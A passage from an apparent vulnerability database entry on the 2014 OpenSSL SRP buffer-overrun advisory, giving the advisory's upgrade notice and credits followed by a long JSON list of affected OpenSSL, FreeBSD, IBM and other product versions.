A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected.
OpenSSL 1.0.1 SSL/TLS users should upgrade to 1.0.1i.
Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt
Note: the online version of the advisory may be updated with additional details over time
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0082", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1 thats all 1.0.1i" }, { "model": "hp virtual connect", "scope": "lt", "trust": 0.8, "vendor": "hewlett packard", "version": "8gb 24 port fiber channel module 3.00 (vc ( virtual connect ) 4.40 )" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "-release-p2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.8" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.2-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "7.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "7.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "-release/alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.1" }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos os 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.4" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "6.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "tealeaf cx", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "-stablepre2001-07-20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "6.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "7.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "7.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "junos os 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "7.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2x" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "7.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "8.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0.x" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "7.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7" }, { "model": "-pre-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "7.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.5" }, { "model": "7.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3x" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-stablepre2002-03-07", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6.1" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "7.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "8.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.3-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "6.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "7.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": 